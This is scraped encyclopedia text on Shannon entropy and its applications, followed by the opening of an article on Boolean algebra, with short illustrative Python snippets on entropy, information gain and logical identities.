entropy-related concepts that mathematically quantify information content of a sequence or message: (The "rate of self-information" can also be defined for a particular sequence of messages or symbols generated by a given stochastic process: this will always be equal to the entropy rate in the case of astationary process.) Otherquantities of informationare also used to compare or relate different sources of information. It is important not to confuse the above concepts. Often it is only clear from context which one is meant. For example, when someone says that the "entropy" of the English language is about 1 bit per character, they are actually modeling the English language as a stochastic process and talking about its entropyrate. Shannon himself used the term in this way. If very large blocks are used, the estimate of per-character entropy rate may become artificially low because the probability distribution of the sequence is not known exactly; it is only an estimate. 
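A rough, hedged illustration of entropy as a limit on compression: the sketch below estimates the order-0 (single-character) entropy of a short English sample and compares it with the output size of a general-purpose compressor. The sample text and the use of zlib are arbitrary choices for the example, and compressor overhead makes the comparison only indicative for short inputs.

```python
import math
import zlib
from collections import Counter

text = ("the quick brown fox jumps over the lazy dog " * 40).encode()

# Order-0 estimate: entropy of the single-character frequency distribution.
counts = Counter(text)
n = len(text)
h0 = -sum((c / n) * math.log2(c / n) for c in counts.values())
print(f"order-0 entropy estimate: {h0:.2f} bits/char")

# A general-purpose compressor also exploits higher-order structure
# (here, the heavy repetition), so its output can fall well below the
# order-0 estimate.
compressed = zlib.compress(text, 9)
print(f"zlib output: {8 * len(compressed) / n:.2f} bits/char")
```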
If one considers the text of every book ever published as a sequence, with each symbol being the text of a complete book, and if there are N published books, each published only once, the estimate of the probability of each book is 1/N, and the entropy (in bits) is −log2(1/N) = log2(N). As a practical code, this corresponds to assigning each book a unique identifier and using it in place of the text of the book whenever one wants to refer to the book. This is enormously useful for talking about books, but it is not so useful for characterizing the information content of an individual book, or of language in general: it is not possible to reconstruct the book from its identifier without knowing the probability distribution, that is, the complete text of all the books. The key idea is that the complexity of the probabilistic model must be considered. Kolmogorov complexity is a theoretical generalization of this idea that allows the consideration of the information content of a sequence independent of any particular probability model; it considers the shortest program for a universal computer that outputs the sequence. A code that achieves the entropy rate of a sequence for a given model, plus the codebook (i.e. the probabilistic model), is one such program, but it may not be the shortest. The Fibonacci sequence is 1, 1, 2, 3, 5, 8, 13, .... Treating the sequence as a message and each number as a symbol, there are almost as many symbols as there are characters in the message, giving an entropy of approximately log2(n). The first 128 symbols of the Fibonacci sequence have an entropy of approximately 7 bits/symbol, but the sequence can be expressed using a formula [F(n) = F(n−1) + F(n−2) for n = 3, 4, 5, ..., F(1) = 1, F(2) = 1], and this formula has a much lower entropy and applies to any length of the Fibonacci sequence. In cryptanalysis, entropy is often roughly used as a measure of the unpredictability of a cryptographic key, though its real uncertainty is unmeasurable. For example, a 128-bit key that is uniformly and randomly generated has 128 bits of entropy. It also takes (on average) 2127{\displaystyle 2^{127}} guesses to break by brute force. Entropy fails to capture the number of guesses required if the possible keys are not chosen uniformly.[26][27] Instead, a measure called guesswork can be used to measure the effort required for a brute-force attack.[28] Other problems may arise from non-uniform distributions used in cryptography. Consider, for example, a 1,000,000-digit binary one-time pad combined with the message using exclusive-or. If the pad has 1,000,000 bits of entropy, it is perfect. If the pad has 999,999 bits of entropy, evenly distributed (each individual bit of the pad having 0.999999 bits of entropy), it may provide good security. But if the pad has 999,999 bits of entropy, where the first bit is fixed and the remaining 999,999 bits are perfectly random, the first bit of the ciphertext will not be encrypted at all. A common way to define entropy for text is based on the Markov model of text. For an order-0 source (each character is selected independently of the preceding characters), the binary entropy is: H(S)=−∑ipilog⁡pi,{\displaystyle \mathrm {H} ({\mathcal {S}})=-\sum _{i}p_{i}\log p_{i},} where pi is the probability of i.
For a first-orderMarkov source(one in which the probability of selecting a character is dependent only on the immediately preceding character), theentropy rateis:[citation needed] H(S)=−∑ipi∑jpi(j)log⁡pi(j),{\displaystyle \mathrm {H} ({\mathcal {S}})=-\sum _{i}p_{i}\sum _{j}\ p_{i}(j)\log p_{i}(j),} whereiis astate(certain preceding characters) andpi(j){\displaystyle p_{i}(j)}is the probability ofjgivenias the previous character. For a second order Markov source, the entropy rate is H(S)=−∑ipi∑jpi(j)∑kpi,j(k)log⁡pi,j(k).{\displaystyle \mathrm {H} ({\mathcal {S}})=-\sum _{i}p_{i}\sum _{j}p_{i}(j)\sum _{k}p_{i,j}(k)\ \log p_{i,j}(k).} A source setX{\displaystyle {\mathcal {X}}}with a non-uniform distribution will have less entropy than the same set with a uniform distribution (i.e. the "optimized alphabet"). This deficiency in entropy can be expressed as a ratio called efficiency:[29] η(X)=HHmax=−∑i=1np(xi)logb⁡(p(xi))logb⁡(n).{\displaystyle \eta (X)={\frac {H}{H_{\text{max}}}}=-\sum _{i=1}^{n}{\frac {p(x_{i})\log _{b}(p(x_{i}))}{\log _{b}(n)}}.}Applying the basic properties of the logarithm, this quantity can also be expressed as:η(X)=−∑i=1np(xi)logb⁡(p(xi))logb⁡(n)=∑i=1nlogb⁡(p(xi)−p(xi))logb⁡(n)=∑i=1nlogn⁡(p(xi)−p(xi))=logn⁡(∏i=1np(xi)−p(xi)).{\displaystyle {\begin{aligned}\eta (X)&=-\sum _{i=1}^{n}{\frac {p(x_{i})\log _{b}(p(x_{i}))}{\log _{b}(n)}}=\sum _{i=1}^{n}{\frac {\log _{b}\left(p(x_{i})^{-p(x_{i})}\right)}{\log _{b}(n)}}\\[1ex]&=\sum _{i=1}^{n}\log _{n}\left(p(x_{i})^{-p(x_{i})}\right)=\log _{n}\left(\prod _{i=1}^{n}p(x_{i})^{-p(x_{i})}\right).\end{aligned}}} Efficiency has utility in quantifying the effective use of acommunication channel. This formulation is also referred to as the normalized entropy, as the entropy is divided by the maximum entropylogb⁡(n){\displaystyle {\log _{b}(n)}}. Furthermore, the efficiency is indifferent to the choice of (positive) baseb, as indicated by the insensitivity within the final logarithm above thereto. The Shannon entropy is restricted to random variables taking discrete values. The corresponding formula for a continuous random variable withprobability density functionf(x)with finite or infinite supportX{\displaystyle \mathbb {X} }on the real line is defined by analogy, using the above form of the entropy as an expectation:[11]: 224 H(X)=E[−log⁡f(X)]=−∫Xf(x)log⁡f(x)dx.{\displaystyle \mathrm {H} (X)=\mathbb {E} [-\log f(X)]=-\int _{\mathbb {X} }f(x)\log f(x)\,\mathrm {d} x.} This is the differential entropy (or continuous entropy). A precursor of the continuous entropyh[f]is the expression for the functionalΗin theH-theoremof Boltzmann. Although the analogy between both functions is suggestive, the following question must be set: is the differential entropy a valid extension of the Shannon discrete entropy? Differential entropy lacks a number of properties that the Shannon discrete entropy has – it can even be negative – and corrections have been suggested, notablylimiting density of discrete points. To answer this question, a connection must be established between the two functions: In order to obtain a generally finite measure as thebin sizegoes to zero. In the discrete case, the bin size is the (implicit) width of each of then(finite or infinite) bins whose probabilities are denoted bypn. As the continuous domain is generalized, the width must be made explicit. To do this, start with a continuous functionfdiscretized into bins of sizeΔ{\displaystyle \Delta }. 
By the mean-value theorem there exists a valuexiin each bin such thatf(xi)Δ=∫iΔ(i+1)Δf(x)dx{\displaystyle f(x_{i})\Delta =\int _{i\Delta }^{(i+1)\Delta }f(x)\,dx}the integral of the functionfcan be approximated (in the Riemannian sense) by∫−∞∞f(x)dx=limΔ→0∑i=−∞∞f(xi)Δ,{\displaystyle \int _{-\infty }^{\infty }f(x)\,dx=\lim _{\Delta \to 0}\sum _{i=-\infty }^{\infty }f(x_{i})\Delta ,}where this limit and "bin size goes to zero" are equivalent. We will denoteHΔ:=−∑i=−∞∞f(xi)Δlog⁡(f(xi)Δ){\displaystyle \mathrm {H} ^{\Delta }:=-\sum _{i=-\infty }^{\infty }f(x_{i})\Delta \log \left(f(x_{i})\Delta \right)}and expanding the logarithm, we haveHΔ=−∑i=−∞∞f(xi)Δlog⁡(f(xi))−∑i=−∞∞f(xi)Δlog⁡(Δ).{\displaystyle \mathrm {H} ^{\Delta }=-\sum _{i=-\infty }^{\infty }f(x_{i})\Delta \log(f(x_{i}))-\sum _{i=-\infty }^{\infty }f(x_{i})\Delta \log(\Delta ).} AsΔ → 0, we have ∑i=−∞∞f(xi)Δ→∫−∞∞f(x)dx=1∑i=−∞∞f(xi)Δlog⁡(f(xi))→∫−∞∞f(x)log⁡f(x)dx.{\displaystyle {\begin{aligned}\sum _{i=-\infty }^{\infty }f(x_{i})\Delta &\to \int _{-\infty }^{\infty }f(x)\,dx=1\\\sum _{i=-\infty }^{\infty }f(x_{i})\Delta \log(f(x_{i}))&\to \int _{-\infty }^{\infty }f(x)\log f(x)\,dx.\end{aligned}}} Note;log(Δ) → −∞asΔ → 0, requires a special definition of the differential or continuous entropy: h[f]=limΔ→0(HΔ+log⁡Δ)=−∫−∞∞f(x)log⁡f(x)dx,{\displaystyle h[f]=\lim _{\Delta \to 0}\left(\mathrm {H} ^{\Delta }+\log \Delta \right)=-\int _{-\infty }^{\infty }f(x)\log f(x)\,dx,} which is, as said before, referred to as the differential entropy. This means that the differential entropyis nota limit of the Shannon entropy forn→ ∞. Rather, it differs from the limit of the Shannon entropy by an infinite offset (see also the article oninformation dimension). It turns out as a result that, unlike the Shannon entropy, the differential entropy isnotin general a good measure of uncertainty or information. For example, the differential entropy can be negative; also it is not invariant under continuous co-ordinate transformations. This problem may be illustrated by a change of units whenxis a dimensioned variable.f(x)will then have the units of1/x. The argument of the logarithm must be dimensionless, otherwise it is improper, so that the differential entropy as given above will be improper. IfΔis some "standard" value ofx(i.e. "bin size") and therefore has the same units, then a modified differential entropy may be written in proper form as:H=∫−∞∞f(x)log⁡(f(x)Δ)dx,{\displaystyle \mathrm {H} =\int _{-\infty }^{\infty }f(x)\log(f(x)\,\Delta )\,dx,}and the result will be the same for any choice of units forx. In fact, the limit of discrete entropy asN→∞{\displaystyle N\rightarrow \infty }would also include a term oflog⁡(N){\displaystyle \log(N)}, which would in general be infinite. This is expected: continuous variables would typically have infinite entropy when discretized. Thelimiting density of discrete pointsis really a measure of how much easier a distribution is to describe than a distribution that is uniform over its quantization scheme. Another useful measure of entropy that works equally well in the discrete and the continuous case is therelative entropyof a distribution. It is defined as theKullback–Leibler divergencefrom the distribution to a reference measuremas follows. Assume that a probability distributionpisabsolutely continuouswith respect to a measurem, i.e. 
is of the form p(dx) = f(x)m(dx) for some non-negative m-integrable function f with m-integral 1, then the relative entropy can be defined as DKL(p‖m)=∫log⁡(f(x))p(dx)=∫f(x)log⁡(f(x))m(dx).{\displaystyle D_{\mathrm {KL} }(p\|m)=\int \log(f(x))p(dx)=\int f(x)\log(f(x))m(dx).} In this form the relative entropy generalizes (up to change in sign) both the discrete entropy, where the measure m is the counting measure, and the differential entropy, where the measure m is the Lebesgue measure. If the measure m is itself a probability distribution, the relative entropy is non-negative, and zero if p = m as measures. It is defined for any measure space, hence coordinate independent and invariant under coordinate reparameterizations if one properly takes into account the transformation of the measure m. The relative entropy, and (implicitly) entropy and differential entropy, do depend on the "reference" measure m. Terence Tao used entropy to make a useful connection in his solution of the Erdős discrepancy problem.[30][31] Intuitively, the idea behind the proof was that if there is little Shannon information between consecutive random variables XH = λ(n+H){\displaystyle \lambda (n+H)}, defined using the Liouville function (a useful mathematical function for studying the distribution of primes), then the sum of the variable over an interval [n, n+H] can become arbitrarily large. For example, a sequence consisting only of +1's (one of the values XH can take) has trivially low entropy, and its sum grows large. The key insight was to show that the entropy is reduced by non-negligible amounts as H is expanded, which in turn forces unbounded growth of the associated sums, and this is equivalent to the unbounded growth asserted in the Erdős discrepancy problem. The proof is quite involved; it brought together breakthroughs not just in the novel use of Shannon entropy, but also in the use of the Liouville function along with averages of modulated multiplicative functions[32] in short intervals. Proving it also broke the "parity barrier"[33] for this specific problem. While the use of Shannon entropy in the proof is novel, it is likely to open new research in this direction. Entropy has become a useful quantity in combinatorics. A simple example of this is an alternative proof of the Loomis–Whitney inequality: for every subset A ⊆ Zd, we have |A|d−1≤∏i=1d|Pi(A)|{\displaystyle |A|^{d-1}\leq \prod _{i=1}^{d}|P_{i}(A)|} where Pi is the orthogonal projection in the ith coordinate: Pi(A)={(x1,…,xi−1,xi+1,…,xd):(x1,…,xd)∈A}.{\displaystyle P_{i}(A)=\{(x_{1},\ldots ,x_{i-1},x_{i+1},\ldots ,x_{d}):(x_{1},\ldots ,x_{d})\in A\}.} The proof follows as a simple corollary of Shearer's inequality: if X1, ..., Xd are random variables and S1, ..., Sn are subsets of {1, ..., d} such that every integer between 1 and d lies in exactly r of these subsets, then H[(X1,…,Xd)]≤1r∑i=1nH[(Xj)j∈Si]{\displaystyle \mathrm {H} [(X_{1},\ldots ,X_{d})]\leq {\frac {1}{r}}\sum _{i=1}^{n}\mathrm {H} [(X_{j})_{j\in S_{i}}]} where (Xj)j∈Si{\displaystyle (X_{j})_{j\in S_{i}}} is the Cartesian product of random variables Xj with indexes j in Si (so the dimension of this vector is equal to the size of Si). We sketch how Loomis–Whitney follows from this: let X be a uniformly distributed random variable with values in A, so that each point in A occurs with equal probability. Then (by the further properties of entropy mentioned above) Η(X) = log|A|, where |A| denotes the cardinality of A. Let Si = {1, 2, ..., i−1, i+1, ..., d}.
The range of (Xj)j∈Si{\displaystyle (X_{j})_{j\in S_{i}}} is contained in Pi(A) and hence H[(Xj)j∈Si]≤log⁡|Pi(A)|{\displaystyle \mathrm {H} [(X_{j})_{j\in S_{i}}]\leq \log |P_{i}(A)|}. Using this to bound the right side of Shearer's inequality (here every index lies in exactly r = d − 1 of the sets Si) and exponentiating both sides of the resulting inequality yields the Loomis–Whitney inequality. For integers 0 < k < n let q = k/n. Then 2nH(q)n+1≤(nk)≤2nH(q),{\displaystyle {\frac {2^{n\mathrm {H} (q)}}{n+1}}\leq {\tbinom {n}{k}}\leq 2^{n\mathrm {H} (q)},} where[34]: 43 H(q)=−qlog2⁡(q)−(1−q)log2⁡(1−q).{\displaystyle \mathrm {H} (q)=-q\log _{2}(q)-(1-q)\log _{2}(1-q).} To see this, note that (nk)qqn(1−q)n−nq=(nk)qk(1−q)n−k{\displaystyle {\tbinom {n}{k}}q^{qn}(1-q)^{n-nq}={\tbinom {n}{k}}q^{k}(1-q)^{n-k}} is one term of the expression ∑i=0n(ni)qi(1−q)n−i=(q+(1−q))n=1,{\displaystyle \sum _{i=0}^{n}{\tbinom {n}{i}}q^{i}(1-q)^{n-i}=(q+(1-q))^{n}=1,} so it is at most 1; rearranging, using q−qn(1−q)−(n−nq)=2nH(q){\displaystyle q^{-qn}(1-q)^{-(n-nq)}=2^{n\mathrm {H} (q)}}, gives the upper bound. For the lower bound one first shows, using some algebra, that it is the largest term in the summation. But then, (nk)qqn(1−q)n−nq≥1n+1{\displaystyle {\binom {n}{k}}q^{qn}(1-q)^{n-nq}\geq {\frac {1}{n+1}}} since there are n + 1 terms in the summation. Rearranging gives the lower bound. A nice interpretation of this is that the number of binary strings of length n with exactly k many 1's is approximately 2nH(k/n){\displaystyle 2^{n\mathrm {H} (k/n)}}.[35] Machine learning techniques arise largely from statistics and information theory. In general, entropy is a measure of uncertainty and the objective of machine learning is to minimize uncertainty. Decision tree learning algorithms use relative entropy to determine the decision rules that govern the data at each node.[36] The information gain in decision trees IG(Y,X){\displaystyle IG(Y,X)}, which is equal to the difference between the entropy of Y{\displaystyle Y} and the conditional entropy of Y{\displaystyle Y} given X{\displaystyle X}, quantifies the expected information, or the reduction in entropy, from additionally knowing the value of an attribute X{\displaystyle X}. The information gain is used to identify which attributes of the dataset provide the most information and should be used to split the nodes of the tree optimally. Bayesian inference models often apply the principle of maximum entropy to obtain prior probability distributions.[37] The idea is that the distribution that best represents the current state of knowledge of a system is the one with the largest entropy, and is therefore suitable to be the prior. Classification in machine learning performed by logistic regression or artificial neural networks often employs a standard loss function, called cross-entropy loss, that minimizes the average cross entropy between the ground-truth and predicted distributions.[38] In general, cross-entropy is a measure of the differences between two probability distributions, similar to the KL divergence (also known as relative entropy). This article incorporates material from Shannon's entropy on PlanetMath, which is licensed under the Creative Commons Attribution/Share-Alike License.
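As a sketch of the information gain quantity IG(Y, X) = H(Y) − H(Y|X) described above, the following code computes it for a tiny made-up dataset; the labels, attribute values, and function names are invented for the example.

```python
import math
from collections import Counter

def entropy(labels):
    # Shannon entropy (in bits) of the empirical label distribution.
    n = len(labels)
    return -sum((c / n) * math.log2(c / n) for c in Counter(labels).values())

def information_gain(labels, attribute):
    # IG(Y, X) = H(Y) - H(Y | X): expected reduction in label entropy
    # from knowing the value of attribute X.
    n = len(labels)
    groups = {}
    for y, x in zip(labels, attribute):
        groups.setdefault(x, []).append(y)
    h_cond = sum(len(g) / n * entropy(g) for g in groups.values())
    return entropy(labels) - h_cond

# Tiny made-up dataset: does the label correlate with the attribute?
labels    = ["yes", "yes", "no", "no", "yes", "no"]
attribute = ["sunny", "sunny", "rain", "rain", "sunny", "rain"]
print(information_gain(labels, attribute))   # 1.0: the split removes all uncertainty

other = ["a", "b", "a", "b", "a", "b"]
print(information_gain(labels, other))       # ~0.08: this split is nearly uninformative
```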
https://en.wikipedia.org/wiki/Shannon_entropy
Inmathematicsandmathematical logic,Boolean algebrais a branch ofalgebra. It differs fromelementary algebrain two ways. First, the values of thevariablesare thetruth valuestrueandfalse, usually denoted by 1 and 0, whereas in elementary algebra the values of the variables are numbers. Second, Boolean algebra useslogical operatorssuch asconjunction(and) denoted as∧,disjunction(or) denoted as∨, andnegation(not) denoted as¬. Elementary algebra, on the other hand, uses arithmetic operators such as addition, multiplication, subtraction, and division. Boolean algebra is therefore a formal way of describinglogical operationsin the same way that elementary algebra describes numerical operations. Boolean algebra was introduced byGeorge Boolein his first bookThe Mathematical Analysis of Logic(1847),[1]and set forth more fully in hisAn Investigation of the Laws of Thought(1854).[2]According toHuntington, the termBoolean algebrawas first suggested byHenry M. Shefferin 1913,[3]althoughCharles Sanders Peircegave the title "A Boolian [sic] Algebra with One Constant" to the first chapter of his "The Simplest Mathematics" in 1880.[4]Boolean algebra has been fundamental in the development ofdigital electronics, and is provided for in all modernprogramming languages. It is also used inset theoryandstatistics.[5] A precursor of Boolean algebra wasGottfried Wilhelm Leibniz'salgebra of concepts. The usage of binary in relation to theI Chingwas central to Leibniz'scharacteristica universalis. It eventually created the foundations of algebra of concepts.[6]Leibniz's algebra of concepts is deductively equivalent to the Boolean algebra of sets.[7] Boole's algebra predated the modern developments inabstract algebraandmathematical logic; it is however seen as connected to the origins of both fields.[8]In an abstract setting, Boolean algebra was perfected in the late 19th century byJevons,Schröder,Huntingtonand others, until it reached the modern conception of an (abstract)mathematical structure.[8]For example, the empirical observation that one can manipulate expressions in thealgebra of sets, by translating them into expressions in Boole's algebra, is explained in modern terms by saying that the algebra of sets isaBoolean algebra(note theindefinite article). In fact,M. H. Stoneproved in 1936that every Boolean algebra isisomorphicto afield of sets.[9][10] In the 1930s, while studyingswitching circuits,Claude Shannonobserved that one could also apply the rules of Boole's algebra in this setting,[11]and he introducedswitching algebraas a way to analyze and design circuits by algebraic means in terms oflogic gates. Shannon already had at his disposal the abstract mathematical apparatus, thus he cast his switching algebra as thetwo-element Boolean algebra. In modern circuit engineering settings, there is little need to consider other Boolean algebras, thus "switching algebra" and "Boolean algebra" are often used interchangeably.[12][13][14] Efficient implementationofBoolean functionsis a fundamental problem in thedesignofcombinational logiccircuits. Modernelectronic design automationtools forvery-large-scale integration(VLSI) circuits often rely on an efficient representation of Boolean functions known as (reduced ordered)binary decision diagrams(BDD) forlogic synthesisandformal verification.[15] Logic sentences that can be expressed in classicalpropositional calculushave anequivalent expressionin Boolean algebra. 
Thus,Boolean logicis sometimes used to denote propositional calculus performed in this way.[16][17][18]Boolean algebra is not sufficient to capture logic formulas usingquantifiers, like those fromfirst-order logic. Although the development ofmathematical logicdid not follow Boole's program, the connection between his algebra and logic was later put on firm ground in the setting ofalgebraic logic, which also studies the algebraic systems of many other logics.[8]Theproblem of determining whetherthe variables of a given Boolean (propositional) formula can be assigned in such a way as to make the formula evaluate to true is called theBoolean satisfiability problem(SAT), and is of importance totheoretical computer science, being the first problem shown to beNP-complete. The closely relatedmodel of computationknown as aBoolean circuitrelatestime complexity(of analgorithm) tocircuit complexity. Whereas expressions denote mainlynumbersin elementary algebra, in Boolean algebra, they denote thetruth valuesfalseandtrue. These values are represented with thebits, 0 and 1. They do not behave like theintegers0 and 1, for which1 + 1 = 2, but may be identified with the elements of thetwo-element fieldGF(2), that is,integer arithmetic modulo 2, for which1 + 1 = 0. Addition and multiplication then play the Boolean roles of XOR (exclusive-or) and AND (conjunction), respectively, with disjunctionx∨y(inclusive-or) definable asx+y−xyand negation¬xas1 −x. InGF(2),−may be replaced by+, since they denote the same operation; however, this way of writing Boolean operations allows applying the usual arithmetic operations of integers (this may be useful when using a programming language in whichGF(2)is not implemented). Boolean algebra also deals withfunctionswhich have their values in the set{0,1}. Asequence of bitsis a commonly used example of such a function. Another common example is the totality of subsets of a setE: to a subsetFofE, one can define theindicator functionthat takes the value1onF, and0outsideF. The most general example is the set elements of aBoolean algebra, with all of the foregoing being instances thereof. As with elementary algebra, the purely equational part of the theory may be developed, without considering explicit values for the variables.[19] While Elementary algebra has four operations (addition, subtraction, multiplication, and division), the Boolean algebra has only three basic operations:conjunction,disjunction, andnegation, expressed with the correspondingbinary operatorsAND(∧{\displaystyle \land }) and OR (∨{\displaystyle \lor }) and theunary operatorNOT(¬{\displaystyle \neg }), collectively referred to asBoolean operators.[20]Variables in Boolean algebra that store the logical value of 0 and 1 are called theBoolean variables. They are used to store either true or false values.[21]The basic operations on Boolean variablesxandyare defined as follows: Alternatively, the values ofx∧y,x∨y, and ¬xcan be expressed by tabulating their values withtruth tablesas follows:[22] When used in expressions, the operators are applied according to the precedence rules. 
As with elementary algebra, expressions in parentheses are evaluated first, following the precedence rules.[23] If the truth values 0 and 1 are interpreted as integers, these operations may be expressed with the ordinary operations of arithmetic (wherex+yuses addition andxyuses multiplication), or by the minimum/maximum functions: One might consider that only negation and one of the two other operations are basic because of the following identities that allow one to define conjunction in terms of negation and the disjunction, and vice versa (De Morgan's laws):[24] Operations composed from the basic operations include, among others, the following: These definitions give rise to the following truth tables giving the values of these operations for all four possible inputs. Alawof Boolean algebra is anidentitysuch asx∨ (y∨z) = (x∨y) ∨zbetween two Boolean terms, where aBoolean termis defined as an expression built up from variables and the constants 0 and 1 using the operations ∧, ∨, and ¬. The concept can be extended to terms involving other Boolean operations such as ⊕, →, and ≡, but such extensions are unnecessary for the purposes to which the laws are put. Such purposes include the definition of aBoolean algebraas anymodelof the Boolean laws, and as a means for deriving new laws from old as in the derivation ofx∨ (y∧z) =x∨ (z∧y)fromy∧z=z∧y(as treated in§ Axiomatizing Boolean algebra). Boolean algebra satisfies many of the same laws as ordinary algebra when one matches up ∨ with addition and ∧ with multiplication. In particular the following laws are common to both kinds of algebra:[25][26] The following laws hold in Boolean algebra, but not in ordinary algebra: Takingx= 2in the third law above shows that it is not an ordinary algebra law, since2 × 2 = 4. The remaining five laws can be falsified in ordinary algebra by taking all variables to be 1. For example, in absorption law 1, the left hand side would be1(1 + 1) = 2, while the right hand side would be 1 (and so on). All of the laws treated thus far have been for conjunction and disjunction. These operations have the property that changing either argument either leaves the output unchanged, or the output changes in the same way as the input. Equivalently, changing any variable from 0 to 1 never results in the output changing from 1 to 0. Operations with this property are said to bemonotone. Thus the axioms thus far have all been for monotonic Boolean logic. Nonmonotonicity enters via complement ¬ as follows.[5] The complement operation is defined by the following two laws. All properties of negation including the laws below follow from the above two laws alone.[5] In both ordinary and Boolean algebra, negation works by exchanging pairs of elements, hence in both algebras it satisfies the double negation law (also called involution law) But whereasordinary algebrasatisfies the two laws Boolean algebra satisfiesDe Morgan's laws: The laws listed above define Boolean algebra, in the sense that they entail the rest of the subject. The lawscomplementation1 and 2, together with the monotone laws, suffice for this purpose and can therefore be taken as one possiblecompleteset of laws oraxiomatizationof Boolean algebra. Every law of Boolean algebra follows logically from these axioms. Furthermore, Boolean algebras can then be defined as themodelsof these axioms as treated in§ Boolean algebras. Writing down further laws of Boolean algebra cannot give rise to any new consequences of these axioms, nor can it rule out any model of them. 
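Because the variables only take the values 0 and 1, laws like these can be verified exhaustively. The short Python sketch below (a minimal illustration; the choice of laws and the helper names are ours) checks a handful of the identities above over every assignment:

```python
from itertools import product

AND = lambda a, b: a & b
OR  = lambda a, b: a | b
NOT = lambda a: 1 - a

for x, y, z in product((0, 1), repeat=3):
    # associativity and commutativity
    assert OR(x, OR(y, z)) == OR(OR(x, y), z)
    assert AND(x, y) == AND(y, x)
    # distributivity of each operation over the other
    assert AND(x, OR(y, z)) == OR(AND(x, y), AND(x, z))
    assert OR(x, AND(y, z)) == AND(OR(x, y), OR(x, z))
    # absorption
    assert AND(x, OR(x, y)) == x
    assert OR(x, AND(x, y)) == x
    # complementation and De Morgan's laws
    assert AND(x, NOT(x)) == 0 and OR(x, NOT(x)) == 1
    assert NOT(AND(x, y)) == OR(NOT(x), NOT(y))
print("all listed identities hold for every 0/1 assignment")
```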
In contrast, in a list of some but not all of the same laws, there could have been Boolean laws that did not follow from those on the list, and moreover there would have been models of the listed laws that were not Boolean algebras. This axiomatization is by no means the only one, or even necessarily the most natural given that attention was not paid as to whether some of the axioms followed from others, but there was simply a choice to stop when enough laws had been noticed, treated further in§ Axiomatizing Boolean algebra. Or the intermediate notion of axiom can be sidestepped altogether by defining a Boolean law directly as anytautology, understood as an equation that holds for all values of its variables over 0 and 1.[27][28]All these definitions of Boolean algebra can be shown to be equivalent. Principle: If {X, R} is apartially ordered set, then {X, R(inverse)} is also a partially ordered set. There is nothing special about the choice of symbols for the values of Boolean algebra. 0 and 1 could be renamed toαandβ, and as long as it was done consistently throughout, it would still be Boolean algebra, albeit with some obvious cosmetic differences. But suppose 0 and 1 were renamed 1 and 0 respectively. Then it would still be Boolean algebra, and moreover operating on the same values. However, it would not be identical to our original Boolean algebra because now ∨ behaves the way ∧ used to do and vice versa. So there are still some cosmetic differences to show that the notation has been changed, despite the fact that 0s and 1s are still being used. But if in addition to interchanging the names of the values, the names of the two binary operations are also interchanged,nowthere is no trace of what was done. The end product is completely indistinguishable from what was started with. The columns forx∧yandx∨yin the truth tables have changed places, but that switch is immaterial. When values and operations can be paired up in a way that leaves everything important unchanged when all pairs are switched simultaneously, the members of each pair are calleddualto each other. Thus 0 and 1 are dual, and ∧ and ∨ are dual. Theduality principle, also calledDe Morgan duality, asserts that Boolean algebra is unchanged when all dual pairs are interchanged. One change not needed to make as part of this interchange was to complement. Complement is aself-dualoperation. The identity or do-nothing operationx(copy the input to the output) is also self-dual. A more complicated example of a self-dual operation is(x∧y) ∨ (y∧z) ∨ (z∧x). There is no self-dual binary operation that depends on both its arguments. A composition of self-dual operations is a self-dual operation. For example, iff(x,y,z) = (x∧y) ∨ (y∧z) ∨ (z∧x), thenf(f(x,y,z),x,t)is a self-dual operation of four argumentsx,y,z,t. The principle of duality can be explained from agroup theoryperspective by the fact that there are exactly four functions that are one-to-one mappings (automorphisms) of the set ofBoolean polynomialsback to itself: the identity function, the complement function, the dual function and the contradual function (complemented dual). These four functions form agroupunderfunction composition, isomorphic to theKlein four-group,actingon the set of Boolean polynomials.Walter Gottschalkremarked that consequently a more appropriate name for the phenomenon would be theprinciple(orsquare)of quaternality.[5]: 21–22 AVenn diagram[29]can be used as a representation of a Boolean operation using shaded overlapping regions. 
There is one region for each variable, all circular in the examples here. The interior and exterior of regionxcorresponds respectively to the values 1 (true) and 0 (false) for variablex. The shading indicates the value of the operation for each combination of regions, with dark denoting 1 and light 0 (some authors use the opposite convention). The three Venn diagrams in the figure below represent respectively conjunctionx∧y, disjunctionx∨y, and complement ¬x. For conjunction, the region inside both circles is shaded to indicate thatx∧yis 1 when both variables are 1. The other regions are left unshaded to indicate thatx∧yis 0 for the other three combinations. The second diagram represents disjunctionx∨yby shading those regions that lie inside either or both circles. The third diagram represents complement ¬xby shading the regionnotinside the circle. While we have not shown the Venn diagrams for the constants 0 and 1, they are trivial, being respectively a white box and a dark box, neither one containing a circle. However, we could put a circle forxin those boxes, in which case each would denote a function of one argument,x, which returns the same value independently ofx, called a constant function. As far as their outputs are concerned, constants and constant functions are indistinguishable; the difference is that a constant takes no arguments, called azeroaryornullaryoperation, while a constant function takes one argument, which it ignores, and is aunaryoperation. Venn diagrams are helpful in visualizing laws. The commutativity laws for ∧ and ∨ can be seen from the symmetry of the diagrams: a binary operation that was not commutative would not have a symmetric diagram because interchangingxandywould have the effect of reflecting the diagram horizontally and any failure of commutativity would then appear as a failure of symmetry. Idempotenceof ∧ and ∨ can be visualized by sliding the two circles together and noting that the shaded area then becomes the whole circle, for both ∧ and ∨. To see the first absorption law,x∧ (x∨y) =x, start with the diagram in the middle forx∨yand note that the portion of the shaded area in common with thexcircle is the whole of thexcircle. For the second absorption law,x∨ (x∧y) =x, start with the left diagram forx∧yand note that shading the whole of thexcircle results in just thexcircle being shaded, since the previous shading was inside thexcircle. The double negation law can be seen by complementing the shading in the third diagram for ¬x, which shades thexcircle. To visualize the first De Morgan's law,(¬x) ∧ (¬y) = ¬(x∨y), start with the middle diagram forx∨yand complement its shading so that only the region outside both circles is shaded, which is what the right hand side of the law describes. The result is the same as if we shaded that region which is both outside thexcircleandoutside theycircle, i.e. the conjunction of their exteriors, which is what the left hand side of the law describes. The second De Morgan's law,(¬x) ∨ (¬y) = ¬(x∧y), works the same way with the two diagrams interchanged. The first complement law,x∧ ¬x= 0, says that the interior and exterior of thexcircle have no overlap. The second complement law,x∨ ¬x= 1, says that everything is either inside or outside thexcircle. Digital logic is the application of the Boolean algebra of 0 and 1 to electronic hardware consisting oflogic gatesconnected to form acircuit diagram. Each gate implements a Boolean operation, and is depicted schematically by a shape indicating the operation. 
